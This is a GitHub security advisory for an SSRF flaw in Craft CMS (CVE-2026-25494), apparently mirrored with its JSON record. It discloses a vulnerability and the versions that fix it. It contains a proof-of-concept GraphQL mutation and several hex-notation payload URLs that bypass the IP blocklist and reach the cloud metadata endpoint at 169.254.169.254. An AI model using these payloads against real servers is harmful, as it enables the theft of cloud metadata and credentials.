GHSA-M5R2-8P9X-HP5M

Vulnerability from github – Published: 2026-02-09 20:35 – Updated: 2026-02-09 22:38
VLAI?
Summary
Craft CMS Vulnerable to SSRF in GraphQL Asset Mutation via Alternative IP Notation
Details

I observed a recent commit intended to mitigate Server-Side Request Forgery (SSRF) vulnerabilities. While the implemented defense mechanisms are an improvement, I have identified two methods to bypass these protections. This report details the first bypass method involving alternative IP notation, while the second method will be submitted in a separate advisory.

Summary

The saveAsset GraphQL mutation uses filter_var(..., FILTER_VALIDATE_IP) to block a specific list of IP addresses. However, alternative IP notations (hexadecimal, mixed) are not recognized by this function, allowing attackers to bypass the blocklist and access cloud metadata services.

Proof of Concept

  1. Send the following GraphQL mutation:
mutation {
    save_images_Asset(_file: { 
        url: "http://169.254.0xa9fe/latest/meta-data/"
        filename: "metadata.txt"
    }) {
        id
    }
}
  1. The IP validation passes (hex notation not recognized as IP)
  2. Guzzle resolves 169.254.0xa9fe to 169.254.169.254
  3. Cloud metadata is fetched and saved

Alternative Payloads

Payload Notation Resolves To
http://169.254.0xa9fe/ Mixed (decimal + hex) 169.254.169.254
http://0xa9.0xfe.0xa9.0xfe/ Full hex dotted 169.254.169.254
http://0xa9fea9fe/ Single hex integer 169.254.169.254

Technical Details

File: src/gql/resolvers/mutations/Asset.php Root Cause: filter_var($hostname, FILTER_VALIDATE_IP) only recognizes standard dotted-decimal notation. Hex representations bypass this check, but Guzzle still resolves them.

// Line 287 - Fails to catch hex notation
filter_var($hostname, FILTER_VALIDATE_IP)
Severity ?
6.9 (Medium)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.8.21"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0-RC1"
            },
            {
              "fixed": "5.8.22"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.16.17"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0-RC1"
            },
            {
              "fixed": "4.16.18"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25494"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-09T20:35:35Z",
    "nvd_published_at": "2026-02-09T20:15:57Z",
    "severity": "MODERATE"
  },
  "details": "I observed a [recent commit](https://github.com/craftcms/cms/commit/9d9b46a9e40cbdfb20d0d933abb546be12ccd3af) intended to mitigate Server-Side Request Forgery (SSRF) vulnerabilities. While the implemented defense mechanisms are an improvement, I have identified two methods to bypass these protections. This report details the first bypass method involving alternative IP notation, while the second method will be submitted in a separate advisory.\n\n---\n## Summary\n\nThe `saveAsset` GraphQL mutation uses `filter_var(..., FILTER_VALIDATE_IP)` to block a specific list of IP addresses. However, alternative IP notations (hexadecimal, mixed) are not recognized by this function, allowing attackers to bypass the blocklist and access cloud metadata services.\n\n---\n## Proof of Concept\n1. Send the following GraphQL mutation:\n```graphql\nmutation {\n    save_images_Asset(_file: { \n        url: \"http://169.254.0xa9fe/latest/meta-data/\"\n        filename: \"metadata.txt\"\n    }) {\n        id\n    }\n}\n```\n2. The IP validation passes (hex notation not recognized as IP)\n3. Guzzle resolves `169.254.0xa9fe` to `169.254.169.254`\n4. Cloud metadata is fetched and saved\n\n### Alternative Payloads\n| Payload | Notation | Resolves To |\n|---------|----------|-------------|\n| `http://169.254.0xa9fe/` | Mixed (decimal + hex) | 169.254.169.254 |\n| `http://0xa9.0xfe.0xa9.0xfe/` | Full hex dotted | 169.254.169.254 |\n| `http://0xa9fea9fe/` | Single hex integer | 169.254.169.254 |\n\n---\n## Technical Details\n\n**File:** `src/gql/resolvers/mutations/Asset.php`\n**Root Cause:** `filter_var($hostname, FILTER_VALIDATE_IP)` only recognizes standard dotted-decimal notation. Hex representations bypass this check, but Guzzle still resolves them.\n\n```php\n// Line 287 - Fails to catch hex notation\nfilter_var($hostname, FILTER_VALIDATE_IP)\n```",
  "id": "GHSA-m5r2-8p9x-hp5m",
  "modified": "2026-02-09T22:38:00Z",
  "published": "2026-02-09T20:35:35Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/security/advisories/GHSA-m5r2-8p9x-hp5m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25494"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/commit/d49e93e5ba0c48939ce5eaa6cd9b4a990542d8b2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/craftcms/cms"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/releases/tag/4.16.18"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/releases/tag/5.8.22"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Craft CMS Vulnerable to SSRF in GraphQL Asset Mutation via Alternative IP Notation"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.